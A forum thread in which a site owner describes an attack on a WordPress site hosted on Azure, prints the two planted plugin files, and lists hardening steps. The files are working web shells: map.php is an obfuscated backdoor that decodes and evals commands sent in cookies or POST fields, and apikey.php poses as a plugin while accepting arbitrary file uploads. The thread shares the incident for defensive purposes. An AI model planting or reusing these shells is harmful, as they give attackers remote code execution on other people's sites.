Forum Discussion

Dave Rendón's avatar
Sep 30, 2019

Malware Wordpress on Azure

Recently received a security alert on a wordpress webapp running on Azure: 

 

1. There was a non-recognized authentication as admin user

2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php

3. The user performed a "test" through the "plugin"

 

Example of the code map.php:

 

 

<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}

 

  

Example of code apikey.php:

 

 

<?php
/**
 * @package api key
 */
/*
Plugin Name: api key
*/

if ("hello"==$_GET["test"])
{
 echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
 move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
 echo "true";
}

 

 

Image of the "Plugin" on the wordpress site: 

 

Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. 

 

Recommendations: 

 . Enable Sucuri plugin on your WP

 . Enable WAF v2 on your webapp

 . If possible isolate your resource using App Service Environment

 . Harden NSG(s)

 . Perform a SSL Test on your web app

 

If you have any other tip recommendation please share!

    • Dave Rendón's avatar
      Dave Rendón
      MVP

      Thanks camilajames, sorry for the late response, I was able to solve it thru Kudu Console and some 3rd party plugins. Will keep your recommendation handy. 

       

      Cheers.

      -dave

Resources